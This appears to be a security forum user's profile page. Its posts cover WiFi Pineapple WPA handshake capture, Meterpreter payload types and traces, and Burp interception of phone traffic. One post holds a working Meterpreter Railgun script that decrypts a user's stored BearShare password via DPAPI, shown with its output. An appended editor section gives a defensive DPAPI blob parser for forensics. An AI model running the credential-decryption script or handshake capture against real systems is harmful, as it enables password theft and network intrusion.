
mubix

Dedicated Members
  • Posts: 516
  • Joined
  • Last visited
  • Days Won: 3
7 Followers

Contact Methods

  • AIM
    mubix730
  • Website URL
    http://www.room362.com/

Profile Information

  • Gender
    Male
  • Location
    NOVA

Recent Profile Visitors

11,833 profile views

mubix's Achievements

Grand Master (14/14)

  1. Mubix, I'm seeing a lot of issues with the quickcred module you built, and it has never worked for me despite following the blow-by-blow how-to. Had to add my own Responder folder and subsequent logs, no creds captured, full bloning light for at least 20 minutes until I get bored!

     Any chance of a how-to that involves getting the thing to work?

  2. Whatcha been doing with your BashBunny

  3. When I do physical assessments that have WPA/2 enabled wireless networks I would like to have the ability to walk around the facility with a pineapple in my backpack and have it constantly trying to get a handshake in a reliable way. Here are a few requirement requests:
     1. Stability is key. I might only get one walk through to get it done.
     2. Needs to support more than one WPA ESSID (name). If I am targeting a building and they have Employee and Guest networks I need to be able to get both in one go.
     3. See #1
     4. Ability to automatically verify the handshake is valid via Aircrack or other tool
     5. Remove WPA ESSID automatically from the rotation if valid handshake is captured
     6. Shutdown the pineapple if all captured (save battery), optional setting
     7. Constantly be re-scanning the area for best AP to target. (If "BOBWIFI" is no longer in range it shouldn't attack it again)
     8. Always target AP with best signal if possible
     9. Prioritize APs with clients if possible
     10. Have an auto-on with loaded AP names so I can just plug in the Pineapple when it's go time and not have to configure anything post-boot.
     11. Have the ability to auto-add APs in the area to a "temp" list while keeping a "target" list.
     12. List of APs with captured/verified handshakes for easy download of cap file
     13. Use both wifi cards if possible for 5ghz (TETRA) as well as 2ghz
     14. Try a few ways to get the handshake, I know there are a few techniques out there but I don't recall them all.
     Thoughts?
  4. I'm soo late to this game but I made a video to describe my feelings about it and help where I can to spread the word: https://www.youtube.com/watch?v=Wggu_qaYJaQ part of http://hackingtogether.org/ We on this list are for the most part already participating in a social group that has support. I'm not saying we don't have problems, but the ones that don't have such support, who aren't part of any groups or you only see at a con or two, but don't speak, don't participate in CTFs or other side events. Those are the ones (usually) in the most danger of feeling isolated. So, if you know people like that, reach out, invite them to be part of your team, group, or talk. Let us all help to make sure that another life isn't lost for avoidable reasons. There are too few of us as it is.
  5. Pictures and screenshots could help with troubleshooting. Right now all we have to go on is this:
     • You are using a 2GB SD card from an old phone formatted to FAT (I'm assuming this is a microSD)
     • You tried multiple payloads and they didn't work.
     Questions:
     • Are you encoding the payloads?
     • What payloads have you tried?
     • Does it recognize as a keyboard when you plug it in?
     • What operating systems have you tried plugging it into?
     • inject.bin is in the root folder of the SD card right?
  6. HowToGeek has a good write up on cracking WPA - http://www.howtogeek.com/202441/your-wi-fi’s-wpa2-encryption-can-be-cracked-offline-here’s-how/ You also have the Hak5 episode about cracking WPA:
  7. reverse_tcp connections I use when I know that system can get directly to me. bind_tcp I use when I don't have another option and reverse_http / reverse_https are the ones I use the most.
  8. Sorry don't have the phone anymore. Trying to find a phone that will work good. :/
  9. Someone linked me to this on twitter today: http://penturalabs.wordpress.com/2013/07/29/green-for-the-anti-pineapple/
  10. Any ideas on why the droid would show USB not connected, when I connect with the exact same cable to a PC it works just fine. This is what I get in dmesg:
     [ 996.800000] usb 1-1.2: new high-speed USB device number 29 using ehci-platform
     [ 996.930000] scsi20 : usb-storage 1-1.2:1.0
     [ 997.130000] usbcore: deregistering interface driver usbserial_generic
     [ 997.130000] USB Serial deregistering driver generic
     [ 997.140000] usbcore: deregistering interface driver usbserial
     [ 997.170000] usbcore: registered new interface driver usbserial
     [ 997.170000] USB Serial support registered for generic
     [ 997.180000] usbcore: registered new interface driver usbserial_generic
     [ 997.180000] usbserial: USB Serial Driver core
     [ 997.590000] usb 1-1.2: USB disconnect, device number 29
  11. mubix

    Mailvelope

    Mailvelope is still a good solution on Windows. My only hit on the product was that the developer wasn't using the available encryption in Chrome to encrypt his storage so that an offline attacker couldn't get the keys. And yes your point still holds that if people use a good password then the keys will be useless to the attacker.
  12. Honestly these guys covered it really well. Technically Meterpreter itself operates only in memory. So really the only effect it has is when memory is referenced / accessed / or stored (i.e. system profiling software, normal process execution, and hibernate respectively). The more evident parts come in a few flavors:
     • How the Meterpreter shellcode / payload gets executed. Is it a binary you put your payload in? A PDF?
     • Where was it stored? Is it backed up? Is it in a location targeted by Volume Shadow Copies or Restore Points? Does the company have a shared storage of roaming profiles?
     • How was it delivered? Was the delivery encrypted? Was it a single delivery or to many hosts/users?
     • What C2 mechanism is used? HTTP/TCP/DNS/etc? Are the comms encrypted? Do they go through a proxy?
     These are just a small number of questions, and many you can ask in a lab. Run SecurityOnion's live CD, with a pfSense firewall running Squid, put an XP VM behind them and toss your Social Engineering payload at it with your attack C2 outside of it. Use Sysinternals Process Monitor on the victim. Make sure Bro, and all the other gadgets and gizmos SecurityOnion has are enabled and in-line. I guarantee you'll learn a ton just setting everything up, and a ton more once you test out your first SE.
  13. Easiest way is to use Burp proxy to man in the middle all web traffic. Here are some tutorials on how: http://carnal0wnage.attackresearch.com/2010/11/iphone-burp.html http://portswigger.net/burp/help/proxy_options_installingcacert.html#iphone You can check inside SSL with that setup. If it's not web and it's using some other protocol you may be out of luck, but good chance that it's using HTTP or HTTPS.
  14. If you still have the ability to login as that user, forced password change or not, I think you should still be able to decrypt the password. I forced a password change from one administrator account to the other and once logged in (as the user with bearshare installed) I was still able to decrypt the bearshare password.
  15. Ya, it was password stored in the users store. Wrote a quick script to decrypt (mostly stolen from post/windows/gather/credentials/outlook.rb):

         # Make sure crypt32.dll is loaded in railgun
         def prepare_railgun
           rg = session.railgun
           if (!rg.get_dll('crypt32'))
             rg.add_dll('crypt32')
           end
         end

         # Write the DPAPI blob into our own process memory and hand a
         # DATA_BLOB struct to CryptUnprotectData; pointer size depends on arch
         def decrypt_password(data)
           rg = session.railgun
           pid = client.sys.process.getpid
           process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
           mem = process.memory.allocate(128)
           process.memory.write(mem, data)
           if session.sys.process.each_process.find { |i| i["pid"] == pid }["arch"] == "x86"
             addr = [mem].pack("V")
             len = [data.length].pack("V")
             ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
             #print_status("#{ret.inspect}")
             len, addr = ret["pDataOut"].unpack("V2")
           else
             addr = [mem].pack("Q")
             len = [data.length].pack("Q")
             ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
             len, addr = ret["pDataOut"].unpack("Q2")
           end
           return "" if len == 0
           decrypted_pw = process.memory.read(addr, len)
           return decrypted_pw
         end

         # Read a value from the BearShare user key in HKCU
         def get_valdata(k, name)
           @key_base = 'HKCU\\Software\\BearShare\\Users\\superuser@mailinator.com'
           registry_getvaldata("#{@key_base}\\#{k}", name)
         end

         prepare_railgun
         data = get_valdata("", 'Password')
         print_error data.inspect
         password = decrypt_password(data)
         print_status password.inspect

     And got the following output when logged in as Administrator (who installed Bearshare) and with the password of 'password':

         meterpreter > run decrypt_bearshare
         [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x00\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\x9E\xC11.d\x96\x95 \xC6"
         [*] "password\x00"

     I then exported the entire registry tree for Bearshare and moved it to a new user 'bob', importing it as it was from Administrator:

         meterpreter > run decrypt_bearshare
         [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x00\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\x9E\xC11.d\x96\x95 \xC6"
         [*] ""

     No joy (as expected)
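Added example (editor's code, not mubix's script and not part of the Metasploit module it borrows from): a Python parser for the plaintext header of the DPAPI blob the output above prints. The blob bytes are transcribed from the `[-]` line, so the sample is constructed, and nothing is decrypted. The header is what explains the 'bob' result: the master key GUID in it names a master key that lives in Administrator's profile and is derived from Administrator's password, so another user's DPAPI has nothing to unwrap the blob with and CryptUnprotectData returns nothing. `find_dpapi_blobs` generalises the same walk to a registry export or other buffer, to inventory which DPAPI-protected values are present and which master keys they depend on; the `CALG_*` names come from wincrypt.h.

```python
import struct
import uuid

# Every CryptProtectData blob starts with version 1 followed by this well-known
# provider GUID, which is what makes DPAPI blobs easy to spot in raw data.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
DPAPI_MAGIC = b"\x01\x00\x00\x00" + DPAPI_PROVIDER_GUID.bytes_le

# A few CALG_* identifiers from wincrypt.h, enough to label common blobs.
CALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
              0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}

# Constructed sample: the BearShare 'Password' blob from the post's output,
# transcribed byte for byte from the Ruby inspect string (184 bytes).
BEARSHARE_BLOB = (
    b"\x01\x00\x00\x00"                                            # version
    b"\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB"  # provider GUID
    b"\x01\x00\x00\x00"                                            # master key version
    b"\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U"                # master key GUID
    b"\x00\x00\x00\x00"                                            # flags
    b" \x00\x00\x00"                                               # description length (32)
    b"E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00"
    b"\x03f\x00\x00\xA8\x00\x00\x00"                               # CALG_3DES, 168-bit key
    b"\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<"  # salt
    b"\x00\x00\x00\x00"                                            # strong entropy (empty)
    b"\x04\x80\x00\x00\xA0\x00\x00\x00"                            # CALG_SHA1, 160-bit hash
    b"\x10\x00\x00\x00\x06\xC8\x01\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a"  # HMAC key
    b"\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG"   # ciphertext
    b"\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\x9E\xC11.d\x96\x95 \xC6"  # signature
)


class _Reader:
    """Little-endian cursor that refuses to read past the end of the buffer."""

    def __init__(self, buf):
        self.buf, self.off = buf, 0

    def raw(self, n):
        if self.off + n > len(self.buf):
            raise ValueError("truncated DPAPI blob")
        chunk = self.buf[self.off:self.off + n]
        self.off += n
        return chunk

    def u32(self):
        return struct.unpack("<I", self.raw(4))[0]

    def field(self):
        # u32 length prefix followed by that many bytes
        return self.raw(self.u32())


def parse_dpapi_blob(data, allow_trailing=False):
    """Walk a DPAPI blob header and return its fields (no decryption).

    The master key GUID names the per-user master key the blob was wrapped
    with; a blob copied into another user's registry hive still points at the
    original user's key, which that user's DPAPI cannot unwrap.
    """
    r = _Reader(data)
    version = r.u32()
    provider = uuid.UUID(bytes_le=r.raw(16))
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (bad version or provider GUID)")
    hdr = {"master_key_version": r.u32(),
           "master_key_guid": str(uuid.UUID(bytes_le=r.raw(16))),
           "flags": r.u32(),
           "description": r.field().decode("utf-16-le").rstrip("\x00")}
    alg_crypt = r.u32()
    hdr["alg_crypt"] = CALG_NAMES.get(alg_crypt, hex(alg_crypt))
    hdr["key_len"] = r.u32()
    hdr["salt"] = r.field()
    hdr["strong"] = r.field()
    alg_hash = r.u32()
    hdr["alg_hash"] = CALG_NAMES.get(alg_hash, hex(alg_hash))
    hdr["hash_len"] = r.u32()
    hdr["hmac_key"] = r.field()
    hdr["ciphertext"] = r.field()
    hdr["signature"] = r.field()
    hdr["length"] = r.off
    if not allow_trailing and r.off != len(data):
        raise ValueError("trailing bytes after DPAPI signature")
    return hdr


def find_dpapi_blobs(buf):
    """Return (offset, header) for each well-formed DPAPI blob inside buf.

    Intended for triage over a .reg export or memory dump: candidates that
    carry the magic but do not parse cleanly are skipped, not reported.
    """
    found, pos = [], buf.find(DPAPI_MAGIC)
    while pos != -1:
        try:
            hdr = parse_dpapi_blob(buf[pos:], allow_trailing=True)
        except ValueError:
            pos = buf.find(DPAPI_MAGIC, pos + 1)
            continue
        found.append((pos, hdr))
        pos = buf.find(DPAPI_MAGIC, pos + hdr["length"])
    return found


if __name__ == "__main__":
    h = parse_dpapi_blob(BEARSHARE_BLOB)
    print(h["description"], h["master_key_guid"], h["alg_crypt"], h["alg_hash"])
```

Running it prints the description Windows stored with the blob ("EncryptedString"), the master key GUID 97fb01ec-d780-4671-95a7-366226c83755 and the 3DES/SHA1 algorithm pair, which is the XP-era default; on a host you are investigating, the GUID can be matched against the master key files under the user's Protect directory to confirm which account the secret belongs to.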